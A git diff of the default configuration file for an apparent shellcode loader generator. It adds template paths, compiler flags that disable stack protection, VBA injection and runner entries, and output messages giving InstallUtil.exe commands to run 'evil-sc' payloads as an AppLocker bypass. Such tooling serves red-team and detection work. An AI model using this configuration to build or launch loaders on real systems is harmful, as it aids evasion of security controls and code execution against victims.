--- a/core/config/default.ini
+++ b/core/config/default.ini
@@ -28,10 +28,11 @@ loader_template = ${TEMPLATES}/loaderTemplate
 headers = ${TEMPLATES}/headers
 
 [FILES]
-cpp_template_file = core/templates/loaderTemplate/template.cpp
-cs_template_file = core/templates/loaderTemplate/template.cs
-pwsh_template_file = core/templates/loaderTemplate/template.ps1
-vba_template_file = core/templates/loaderTemplate/template.vba
+loader_template = core/templates/loaderTemplate
+cpp_template_file = ${loader_template}/template.cpp
+cs_template_file = ${loader_template}/template.cs
+pwsh_template_file = ${loader_template}/template.ps1
+vba_template_file = ${loader_template}/template.vba
 
 [PLACEHOLDERS]
 shellcode = ####SHELLCODE####
@@ -51,6 +52,8 @@ delay = //####DELAY####
 find_process = //####FIND_PROCESS####
 shellcode_variable = encoded
 
+; the compiler_argument should not define .DLL compilation options (e.g /target:library)
+; It's already defined using the output_format parameters
 
 [DEBUG]
 encoders = False
@@ -62,6 +65,7 @@ syscalls = False
 [windows_cpp:DSys_CurrentThread]
 expected_format = RAW_BIN
 output_format = .exe
+
 
 [windows_cpp:exec]
 expected_format = RAW_BIN
@@ -82,14 +86,20 @@ output_format = .exe
 [windows_cs:InstallUtil.dll]
 expected_format = RAW_BIN
 output_format = .dll
+compiler_args = -r:System.Configuration.Install
+custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.dll"
 
 [windows_cs:InstallUtilHollow]
 expected_format = RAW_BIN
 output_format = .exe
+compiler_args = -r:System.Configuration.Install
+custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.exe"
 
 [windows_cs:InstallUtilPwsh]
 expected_format = RAW_BIN
 output_format = .exe
+compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
+custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.exe"
 
 [windows_cs:NtMapViewOfSection]
 expected_format = RAW_BIN
@@ -119,14 +129,26 @@ output_format = .ps1
 expected_format = DOTNET_BIN,DOTNET_DLL
 output_format = .ps1
 
+[windows_vba:Inject]
+expected_format = RAW_BIN
+output_format = .vba
+
+[windows_vba:Runner]
+expected_format = RAW_BIN
+output_format = .vba
+
 [linux:SimpleExec]
 expected_format = RAW_BIN
 output_format = .elf
+compiler_args = -z execstack -fno-stack-protector
+
 
 [linux:LD_LIBRARY_PATH.so]
 expected_format = RAW_BIN
 output_format = .so
+compiler_args = -z execstack
 
 [linux:LD_PRELOAD.so]
 expected_format = RAW_BIN
 output_format = .so
+compiler_args = -z execstack -Wall
